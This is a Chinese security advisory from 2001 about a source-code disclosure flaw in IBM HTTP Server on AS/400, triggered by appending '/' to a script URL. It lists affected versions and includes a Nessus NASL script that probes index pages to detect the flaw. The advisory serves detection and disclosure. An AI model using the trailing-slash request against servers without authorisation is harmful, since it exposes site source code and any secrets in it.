IBM HTTP Server 源代码泄露问题

发布时间：2001-11-12
更新时间：2001-11-12
严重程度：高
威胁程度：远程非授权文件存取
错误类型：输入验证错误
利用方式：服务器模式

受影响系统

IBM HTTP Server 1.3.3 win32
IBM HTTP Server 1.3.6win32
IBM HTTP Server 1.3.6.4 win32
IBM HTTP Server 1.3.6.3
   - Caldera OpenLinux 2.2
   - IBM AIX 4.2.1
   - Microsoft Windows NT 4.0
   - RedHat Linux 5.2 sparc
   - RedHat Linux 6.0 sparc
   - S.u.S.E. Linux 6.0
   - S.u.S.E. Linux 6.1
   - Sun Solaris 2.6
   - TurboLinux Turbo Linux 3.0.1
IBM HTTP Server 1.3.6.2 win32
IBM HTTP Server 1.3.6.2 unix
IBM HTTP Server 1.3.12.4
   - IBM AIX 4.3.3
   - IBM AIX 5.1
   - RedHat Linux 7.1
   - S.u.S.E. Linux 7.2
IBM HTTP Server 1.3.12.3
   - HP HP-UX 11.0
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6a
   - Sun Solaris 2.6
   - Sun Solaris 7.0
   - Sun Solaris 8.0
IBM HTTP Server 1.3.12.2
   - Caldera OpenLinux 2.3
   - Caldera OpenLinux 2.4
   - HP HP-UX 11.0
   - IBM AIX 4.3.3
   - Microsoft Windows NT 4.0
   - RedHat Linux 6.2 sparc
   - Sun Solaris 2.6
   - TurboLinux Turbo Linux 6.0
IBM HTTP Server 1.3.19
   - HP HP-UX 11.0
   - IBM AIX 4.3.3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6a
   - RedHat Linux 7.1
   - S.u.S.E. Linux 7.1
   - Sun Solaris 2.6
   - Sun Solaris 7.0

详细描述
在AS/400的IBM HTTP SERVER由于存在输入验证错误，可以导致远程攻击者请求特殊的WEB奇怪请求而导致源代码泄露。

如果对已经存在的脚本追加"/"的请求，会导致脚本源代码泄露。

测试代码
ibm_server_code.nasl script was written by Felix Huber <huberfelix@webtopia.de>
#
# v. 1.00 (last update 08.11.01)

if(description)
{
script_id(?????????);
name["english"] = "IBM-HTTP-Server View Code";
script_name(english:name["english"]);

desc["english"] = "
IBM's HTTP Server on the AS/400 platform is vulnerable to an attack
that will show the source code of the page -- such as an .html or .jsp
page -- by attaching an '/' to the end of a URL.

Example:
http://www.foo.com/getsource.jsp/

Solution :  Not yet

Risk factor : High";

script_description(english:desc["english"]);

summary["english"] = "IBM-HTTP-Server View Code";

script_summary(english:summary["english"]);

script_category(ACT_GATHER_INFO);

script_copyright(english:"This script is Copyright (C) 2001 Felix Huber");
family["english"] = "CGI abuses";
script_family(english:family["english"]);
script_dependencie("find_service.nes");
script_dependencie("httpver.nasl");
script_require_ports("Services/www", 80);
exit(0);
}

#
# The script code starts here
#

port = get_kb_item("Services/www");
if(!port)port = 80;

dir[0] = "/index.html";
dir[1] = "/index.htm";
dir[2] = "/index.jsp";
dir[3] = "/default.html";
dir[4] = "/default.htm";
dir[5] = "/default.jsp";
dir[6] = "/home.html";
dir[7] = "/home.htm";
dir[8] = "/home.jsp";

if(get_port_state(port))
{

for (i = 0; dir[i] ; i = i + 1)
{

     soc = http_open_socket(port);

     if(soc)

     {
        url = string(dir[i], "/");

        req = http_get(item:url, port:port);
        send(socket:soc, data:req);
        r = recv(socket:soc, length:409600);
        close(soc);

        #display(r);

        if("Server: IBM-HTTP-Server/1.0" >< r)
              {
                if("Content-Type: www/unknown" >< r)
                    {
                         #security_hole(port);
                         display("Security Hole detected\n");
                         exit(0);
                    }
              }

     }
}
}

解决方案
尚无

相关信息
"'ken'@FTU" <franklin_tech_bulletins@yahoo.com>
参考：http://www.securityfocus.com/archive/1/LEEPKOFKPCPHJMIIKFGJEENLCBAA.smiler@vxd.org
公司主页：http://www-4.ibm.com/software/webservers/httpservers/download.html

最近严重漏洞

IBM HTTP Server 源代码泄露问题